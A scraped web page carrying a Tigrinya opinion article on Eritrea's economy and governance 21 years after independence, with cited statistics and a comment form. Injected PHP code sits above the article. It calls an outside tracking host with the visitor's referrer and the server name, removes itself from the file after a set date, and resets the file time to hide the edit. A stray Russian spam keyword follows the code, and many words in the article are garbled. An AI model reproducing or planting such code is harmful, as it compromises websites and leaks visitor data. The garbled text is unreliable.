check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ኤሪትረያ*፡ ድሕሪ 21 ዓመታት ናጽነት።
кремлевская диета

ኤሪትረያ*፡ ድሕሪ 21 ዓመታት ናጽነት።

User Rating: / 5
PoorBest 

 

 

 

 

 

 

 

 

ትረያ*፡ ድሕሪ 21 ዓመታት ናጽነት።

/ራሕማን፡ ሰይድ (ቦሃሺም)

ንስለ ዝኽሪ መበል 20 ዓመታት በዓል ናጽነት ትረያ ብምዝካርትረያ፡ ንብላላሽ ዘጥፋኣቶም ዓሰርተታት ዓመታት” ኣብ ትሕቲ ዝብል ኣርእስቲ ዝጻሓፍኩዎ ዓንቀጽ፣ ስርዓት ህግደፍ ኣብ ምዕስካር ትምህርታዊ መደባትን፡ ብሰንኪ ምህሮ ብቛንቃ ኣደ ተባሂሉ፡ ጌና ብዘይማዕበለ መደበ ትምህርቲ ክካየድ ዝፈተነሞ፡ ንኣመንቲ ኣስላም ዝኾኑ መናእሰይ ካብቲ ማዕረኣዊ ዕድላት ትምህርትን፡ ስራሕን ኣብ ውሽጢ ሃገሮም ዘብኮሮም ውዱቕ ተሞክሮ ብምዝካር ጽሒፈ ነይረ። ብቲ ጽሑፍ ባ ዘሎ ፖለውን ቁጠባዊ ቅልውላውን ተናኺፈ ኔረ:: እ ዓንቀጽ እውን ነቲ ዝረአ ዘሎ ኤኮኖሚያ ይኹን ፖሊቲካዊ ሂወት ሃገርና ክትንክፍዩ።

ነዚ ከቢድ ዝተኸፍሎ ናጽነት ሃገ 21 ዓመት ኣብ ኣነብዕሎ ዘሎና ቅን ዘሕዝንዩ ዝፈሸለ ትምህርታዊ መደባት ምስቲ ደረት ዘይብሉን ኩሉ ተደኑሱ ዘሎን፡ ማለት ኣብ ቁጠባ፡ ማሕበራዊ ሂወት፡ ፖልቲካዊ ይኹን ባህላዊ ዘሎ ጉጉይ መደባት ናብ ፍጹም ዕንወት ሃገር ከምርሕ ይኽእልዩ።

ኣብዚ ዓንቀጽ ዋላ ክኢላ ቁጠብ እንተዘይኮንኩ፡ ስርዓት ህግ ሒዙዎ ዘሎ ቁጠባዊ ህይወት ብምምዕዳው፡ ገለ ካብቶም ንሃገርና ካብ ዘይምሕር ድኽነት ከላቕቑ ዝኽእሉ ኣርባሕቲ ነገራት ከብርህ ክፍትንየ። ነዚ ንምጥማት ከብ ዝደፋፍኡኒ መኽንያታትውን እብ አብ ርሒ 3  ኣብ ክልተ ተኸፊሉ፡ ብድምጺ፡ ሬድዮ፡ ኣሜሪካ፡ ኩውንነት ትራዊ ቁጠባ፡ ኣብ ዝገበርኩዎ ኣበርክቶ ዝተመስረተዩ።

ዋላኳ ካብትን ካብዝን ተበጊሱ ትረያ ካብሃገረ ቀጠርይኹንጋናንላዕሊ ፈጣን ቁጠባዊ ዕብየት ንኸተረጋግጽ ተዋዲዳ ዝብል ጸብጻባ ብምቕራብ ከእምኑና ዝፍትኑ እንተሃለዉ፣ ሕጂ 21 ዓመታት ድሕሪ ናጽነት፡  እቲ ሕልሚ ኩሉ ኤርትራዊ ዝነበረ ሃብታምን ምዕብልትን ሃገር ንምፍጣር ንኪ አምባገነና ገባ ስርዓት ህግ ከምዝተሓምሸሸ ንምልላይ ፍልጠት ቁጠባዋያን ዝደሊ ኣይኮነን። ስለዚውን እዞም ብእንጻሩ ዝትርኹ ጸብጻባት እዚኣቶም፡ ምስ ኣብ ዝሓልፈ ዓመት ክኣትዋ ዝተራእያ ገለ ከበድቲ መካይንን ብምዝማድ   ልዕሊ ዓቕሙ ክቃላሕ ምስዝፈተነ ሓበረታ፡ ነዚ ብቑጠባዊ ዝቕባበ ተዓፍኑ ዘሎን፡  ዝተደነሰ ብሕታዊ ውነና ይኹን እዚ ዘይሕጋዊ ህግደፍ ሕጋዊ ስርዓት ይኹን ዲሞክራሳያዊ ምሕደራ ኣብ ዘይብሉ ስርዓት ኣብ ድንጉር ቑጠባዊ ሕልምታቱ ኣሊኹ ክዕምጾን ከበላሹዎን ይርከብ።

መሰረታውያን ሓቂታትን፡ ኣሃዛትን ትረያ ገና ሓንቲ ካብተን ዝደኸያ ሃገራት ዓለምና ምዃና ዘርኢ፡-

·         ሓቀይና ቁጠባዊ ዕብየት (ጂዲፒ) ስጋብ 1 ጥሪ 20112.2%[1] (ደርጃ ቁጽሪ 142)

·         ምጥፋእ ድንቁርና ኣብ ዓበይቲ፡ 58.6[2] (ደርጃ ቁጽሪ 174)

·         ዓመታዊ ሰደድ ንወጻኢ $0.03%[3] (ደርጃ ቁጽሪ 205)

·         ተጠቀምቲ ኢንተርነት 200,000[4] (ደርጃ ቁጽሪ 136). ኣብዚ ኣቲ ሓቂ ግን እቲ ድሕረ ባይታ ናይ ትረያ ተለኮሚኒከሽን ብፍላይ ኣብ ሞባይ ኢንተርነትን ትሒ ሃገራት ሱዳን፡ ሶማልያን፡ ኢትዮጵያን እዩ። ኣብዚ ሓድሕድ ዝተጠማመረ ዓለምለኻዊ ቁጠባ ተለኮሙኒከሽን ኣገዳሲ ተራ ዘሎዎ። እዚ ኮይኑ ከብቅዕ ግን መሪሕነት ህግደፍ እቲ ካብ ናይ ሃገርና ቁጠባዊ ዕብየት ንላዕሊ ብዝያዳ ዝግደሱሉ ስልጣኖም ምሕላውዩ። ስለዚዮም እውን ካብ ንሃገር ካብ ርኽበት ዲጂታዊ ምዕብልናን መራኸቢ ብዙሓንን ዓፊኖሞ ጥራሕ ዘይኮነስ፡ ኣብ ልዕሊ ጋዘጠይናታትን ዘሎዎም ጨካን ኣተሓሕዛን፡ ፍጹም ዓፈና ነጻ ሕትመት ተወሳኺ  ዝኸውን።

·         ኣብ ወርሒ ስጋብ 2000 ዝኾኑ ንሃገሮም ክሃንጹ ዝግባኦም መናእሰያት ዶባት ሃገሮም ቆሪጾም ንጎረባብቲ ሃገራት ይስደዱ ኣሎዉ። ሃገራት ኣፍሪቃኣእሙሮእዊ ምዝቋቕ” (BRAIN DRAIN) የጋጥመን ኣሎ ክበሃል ከሎ፡ ኣብ ትሕቲ ህግደፍ ዘላ ትረያ ግንምዝቋቕ መንእሰይ” (YOUTH DRAIN) እዩ ዘጋጥማ ዘሎ።

   

 ንዳግመ ቁጠባ ዝተኸስሩ ዕድላት 

ትሑት ቁጠባዊ ዓቅሚ ንዘሎዋ ሃገርን፡ ብሰንኪ ዝተናውሐ ኩናትውን ቁጠባኣን ትሕተ ቅርጻታትታን ዝዓነወት ምስ ምዃናውን፡ ኣርሒቑ መሪሕነት እንተዝነብር ልዕሊ ኹሉ ሰሪዑ ክርእዮ ዝግባኦ ዝነበረ ኩሉ ዓቅምታት ንቑጠባ ዕብየቱ ጸንቂቑ ዝእምት፡ መሪሕ መደብ ብቐዳምነት ምስርዐ ነይሩ፣ ኮይኑ ግን ስርዓት ትረያ ነዚ ቁንጣሮ ሃብቲ ሃገር ምስ ጎረባብቲ ሃገራት ውግኣት ብምጽሕታርን፡ ብሓይሊ ንፖሊታካውያን ተቓውምቲ ብሓይሊ ንምልጋሶምን፡  ንመንእሰያትውን ንዘይተወሰን እዋን ኣብ ሃገራዊ ኣገልግሎት ብምቑራኖም ዘህለኾ።   

እዚ ጽጉም ጠባይ ስርዓት ህግደፍ ንኤትረያ እታ ዝደኸመት ሃገር ንስሕበት ንግድን፡ ዕዳጋን ዘይትምቾ ገይሩዋሎ።

ትረያ ቁጠባዊ ዕብየትን፡ ሃብትን ከምጽኡላ ዝኻሉ ኣገደስቲ ረቛሒታት ዝስዕቡኣዮም፡-

1.      ህዝቢ ትረያ ፈታው ስራሕን ቆጣቢን ምዃኑ ዝተፈልጠ ህዝቢ፡ ወዮ ደኣ ካብ 1991 ኣትሒዙ ኣብ ሃገር ኤሪትረያ ጠፊኡ ሃልዩምበር፡  ባዕሉ ዝመረቖን ተሓታትነት ዘሎዎን ኮይኑ ቁሩብ ምኽርን ደገፍን ዝህቦ ረኺቡ ነይሩ እንተዝኸውንሲ ቁጠባዊ ዳግመ ሕውየት ንኽገብር ኣይምተጻገመን። ኣብ ዓቕሚ ሰባ ዝተሞርኮሰትን ዝፈሸለትን ሃገር ስጋብ ሕጂ የላን። ዕብየት ህዝባ ኣብ ብሉጽ ትምህርቲ፡ ኣገልግሎት ጥዕና፡ ዕድል ናይ ምብልሓትን ምዕብልናን ኣፍ ደገ ዘርሓወት ሃገር ዋጋ ምዕብልናኣ ዝፈለጠ ኮይና፡ ኣብ ደያቢ ኤኮኖምያዊ ምዕብልና ብምቕማጥ፡ ካብእተን ዋላኳ ብጸጋ ማዕድናዊ ሃብቲ እንተተመልኣ ብሰንኪ ጨፍለቕቲ ሰብኣዊ መሳላት ዝድኽያ ሃገራት ይበልጻ።

2.      እቶም ባኢጣልያውያን ተመስሪቶም ዝነበሩ ንእሽቱ ናይ እጭርቕቲ ፋብሪካታት ምዕቡላት መካይን ብምትእትታው ክምዕብሉን ደቂ ሃገር፡ ደቂ ወጻእን ኣውፈርቲ ርእሰማል ክስሕቡ ምኻኣሉ ነይሮም። ትረያ ሕጂ ካብቶም ዝተሓቱ ማለት ጥራሕ $300 ሚልዮን ንወጻኢ ሰደድ እትልእክ ሃገርያ። እቲ ምዕቡል ዝነበረ ሰራሕተይና ትረያ ኣብ ከባቢናስ ይትረፍ ኣብ ዓለምውን ማራኺ ዕዳጋዊ ድሮ ሃልዩዎ ምነበሮ ነይሩ። ዞናውያን ዕዳጋታት ክበህሉ ከሎዉ፡ ኢትዮጵያ፡ ሱዳን፡ ጂቡቲ፡ የመንን ሶማልያን ምኾኑ ንየሮም። እዞም ሃገራት እዚኣቶም (ሓዳስ ሃገር ደቡብ ሱዳን አልጊስ) ናኤትረያ ብምንጽጻር ኣብ ዝሓሸ ክውንነት ካብ ትረያ ኣሎዋ፡ ስለኢውን እቕሑት ትረያ ሎሚ ይኹን ንዝመጽእ ከምዘየድልየን ርእይዩ።

3.      ኣገልግሎ ኢንዱስትሪ፡ ብፍላይ ወደባት ባሕሪ፡ ይትረፍ ንናይ  ቀረባ ጎረቤት ኢትዮጵያ ነተን ኣፍደገ ባሕሪ ዘይብለን ሃገራት ከም በዓል ደቡብ፡ ሱዳን፡ ረፓብሊካዊት ጫድ፡ ሰንትራል ኣፍሪካን ረፓብሊክውን ኣገልግሎት ምሃብና። ዕድልና ገይሩዎ ግን ብሰንኪ እዚ ጉጉይ ሊሲ ወጻኢርክክባት ስርዓት ህግደፍ፡ ወደባት ባሕርና ዓሰብን፡ ባጽዕን ብዘይካ እተን ገዛኢ ግስቲ ንስለ ክራይ እትዋት ገዛውቲ ኢሉ ዝሰርሐን ገለ ገዛውቲ ኣንተዘይኮይኑ፡ ዝርአ ህንጻታት ይኹኑ ትሕተ ቅርጻ ዘይተሃንጸለን ድቁሳት ወደባት ገይሩወን ኣሎ። ከተማ ኣስመራ ምስ ኩሉ ውቁብ ህንጻታታ  ኣፍራዪት ማኣከል ንሃገራውን ኣህጉራውን ፋይናንሲያዊ ስርሓትን፡ መራኸቢትን ንምግባር ሆተላታን ምቕባል ኣግይሻን ብምምዕራይ እትዋት እተኻዕብት ከተማ ምግባራ ኣኻኣሎታት ነይሩዩ።

4.      ከም መራኸቢት ኣፍሪቃን አስያን፡ሓጅ/ንግደትን ለምለኻዊ ወደብ ማለት ማርሳ ላይ ይኹን ባጽዕ ንንግደትን ንግድን ኣብ መንጎ ኣፍሪቃን፡ ቀረባዊ ምብራቕን፡ ኣስያን ክኾና ምኸኣላ። ንዝበዝሑ ምዕራብ ኣፍሪቃውያን ወደባት ትረያ እተን ዝተፈትዋ መንገድታት ነቲ ዓመት ዓመት ንንግደት ንቕድስቲ ከተማ መካ ዝነግድ ምኾና ነይረን። እቶም ኣብ ፈቐዶ ከተማታት ትረያ ዝርከቡ ማለት ኣብ ኣስመራ ኣብ ገዛ ታኒካ፡ ኣብ እቁርደት ይኹን ኣብ ከረን ኣብ ሕለት ተካሪር፡ ከምኡውን ማሕበረ-ሰብ አብ ሽ በርካ ጭቡጥ ምሰኻኽር ናይዚ ኣብ መንጎ  ትረያን ነጋዶ ንቕዱስ ቦታ ምዕራብ እፍሪቃውያን  ዘሎ ታሪኻዊ ዝምድዩ። ብተወሳኺውን ኣገደስቲ ጽርግያታት ኣብ መንጎ እዞም ወደባትን፡ ምዕራባውያን ቆላታትን፡ ሱዳንን ምስራሕ ንባዕሉ ሓባራዊ ረብሐ ዝፈጥር ኣፍደገ ንግዲ ምስ እፍሪቃ ዝፈጥር ምኾነ።

ኣገዳስነት ጥዑይ ምሕደራ

ኣብ ላዕሊ ተጠቒሱ ከም ዘሎ፡ ዳግመ ምውላድ ቁጠባ ብቑዕ መሪሕነትን መሳሪሒኡ ዝኾነ ዲሞክራስያዊ ትካላትን ከም ዘድልዩዎ ኩሉ ዝፈልቶ ሓቂዩ። መውፈርቲ ሃብቲ ነጋዶ ጥጡሕን ርጉእን ክውንነት እዮም ዝጠልቡ ሃብቶም ብዝያዳ ንኽኽዕብተሎም። ኣብ ውሽጣ ይኹን ምስ ጎረብብታ ኣብ ውግእ ዘላ ሃገርን፡ እንታይ መጻኢ መደብ ኣሎዎ ኣብ ዘይፍለጥ መንግስትን፡ ሕጋዊ ሰረታት ይኹን መንግስታዊ መሳርሒ ትካላት ኣብ ዘይብሉ ክውንነት ንዕብይት ቁጠባ ይኹን ግዲ ዝምችእ ክውንነት የብሉን።

ዘይዕስክርቲ ትረያ

ኣብ መፈጸምታ፡ ምስጢር ኣይኮነን ህግደፍንዕስክርናከም ንመቆጻጸሪ መንእሰይ ትረያ ይጥቀመሉ ጥራሕ ዘይኮነስ፡ ነቲ ጽሉል ባህግታቶም ከይተርፈ፡ ማለት ንኣብ ጎረባብቲና ዘሎዋ ሃገራትሲ ይትረፍ፡ ነተን ከም በዓል ኮንጎ-ኪሳሻ (ቀደም ዛየር) ዝበሃላ፡ ንብድሕሪ ግናይ መላኺ መራሒኣ ዝነበረሞቡቱ፡ ሰሰሰኮ” ዝተባህለ ምውዳቑ፡ ንዝተፈጥረ ሃብቲ ሃገር ምጎሕጓሕ ዕልቕልቕ ተጠቒሞሙሉ እዮም።

ብዛዕባ ምክልኻል ብዝምልከት፡ ንንእሽቶይ ሃገር ዝበቅዕ ሓዲሽን፡ ዘመና ሃገራ ሓይሊ ምምስት ምሓሸ ኔሩ እዚ ኣተሓሳባ ነይሩ እንተዝነብር፡ ወትሃደራዊ ዓቕሚ ትረያ ኣብ ሓይልታት ባሕርን፡ ኣየርን ዘጽዓቐ፡ ብሓጺርን ማእከላይን ርሕ ተወንጫፊ መሳ ብመሰነይታኡ ጥበባትን ዝዓጠቐ፣ ከምኡውን ምዕቡል ኣጽዋር ዝውንን፡ ስጋብ 50,000 ብቑዓት ወትሃደራት ዝህልዉዎ ንእሽተይን ግን ኣድማዒ ሰራዊት ምውናንዩ ዝነበረ፡ ኣብ ክንዲዚ ግን ልዕሊ 300,000 ዝቑጽሩ ድኹም ዝዕጥቁ፡ ትሑት ዝሞራሉ ወተሃደር ዘሎ።

ወትሃደራዊ ኣገልግሎት ዕቁር ሰራዊት ኣብ ምህናጽን፡ ሓድነት ህዝቢ ኣብ ምርግጋጽን፡ ከምኡውን መንእሰያት ንመዋኣሎም ክጥቀሙሉ ዝኽእሉ ጥበባት  ዘኻዕብቱሉ ኣብ ክንዲ ምዃን፣ ስጋብ ካብ ሃገር ብባሕርን፡ መሬትን ጠንጢኖም ዝህድሙሉ ኩነት ዝፈጠረ ንዘልዓለም ንመንእሰያት ኣብ ወትሃደራዊ መዓስከራት ዘስፍረ ክኸውን ኣይነበሮን።

 ኣብ ምዝዛም፡ ብወገነይ ዝርእዮ ቁጠባዊ ስትራተጂ እንተኾይኑ፡  ተወዳዳሪ ዓለባዊ ኢንዱስትሪ፡ ኣገልግሎት ዝህባ ትካላት፡ ቱሪዝም፡ ንኣሽቱ ኢንዱስትሪታት፡  ኣብ ምምዕባል እዩ። ከምኡውን ኣገልግሎታት ባሕርን፡ ኣየርን ብምምዕባል፡ ወደባትና ንገጂፍ ምቅብባል መራኽብን፡ ነፈርትን ከእንግድ ብዝኻል ተዳልዩ፡ ኣብ መንጎ ኣፍሪቃን፡ ኣስያን ዘሎ ንግዳዊ መማሓላለፊ ማእከል ምግባሩ እዩ። ብማዕረዚውን እቲ ብኸቢድ ዋጋ ዝመጸ ናጽነትና ዝሕሉ ንእሽቶይን ልሉይ ዝኾነ ሰራዊትብምፍጣር ሃገርና ትውሕስ። ብማዕረዚ ኣገደሲ ዝኾነውን፡ ከቢድ ወጻኢ ገንዘብ ንትምህርቲ፡ ብፍላይውን ተክኒካዊ ኣብያተ ትምህርትታት ብምትትእትታው፡ ከም ነዳዲ፡ ጋዝ፡ ማዕድናት ንምምዝማዝ  ዘኽእል ሃገርና ክትጾሮ እትኽእል ምዕብላናዊ መደባት ምውናንዩ።

ዘይወትሃዳራዊትን፡ ምቕልልቲን ትረያ ነቶም ኣርሒቆም ዝጥምቱ ሃገራውያን ይኹኑ ኣህጉራውያን ኣውፈርቲ ርእሰማል እትስሕብ ነዊሕ ዝጠመተት ክትከውን ዝበለጸዩ።

ፍትሕን፡ ሰላምን፡ ሃብትን ኣብ ትረያና ይስፈን!

___________________________________

* እቲ ቅኑዕ ጸዋውዓ ስም ሃገና “ኤትረያ “ እዪ:: “ኤርትራ” ዝብል ጸዋውዓ ብቌንቌ አምሓርኛ ኮይኑ ምስ መግዛእ ኢትዮጵያ ዝተአታተወ እዩ:: ዓበይቲ ዓዲ ትረያያ ከምእውን ሃገራ ደረፍቲ ቶወብር ጊድ ሃገሮ “ኤትረያ “ እንዳበ ድምጽ ርፉ::

 [1] http://www.indexmundi.com/g/r.aspx?c=er&v=66 Accessed on 13 April 2012 . Also see World Figures via this link http://search.worldbank.org/all?qterm=Eritrea%20

 [2] http://www.indexmundi.com/g/r.aspx?t=0&v=39&l=en Accessed on 13 April 2012

 [3] http://www.indexmundi.com/g/r.aspx?t=0&v=85&l=en Accessed on 13 April 2012

 [4] http://www.indexmundi.com/g/r.aspx?t=0&v=118&l=en Accessed on 13 April 2012

  

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player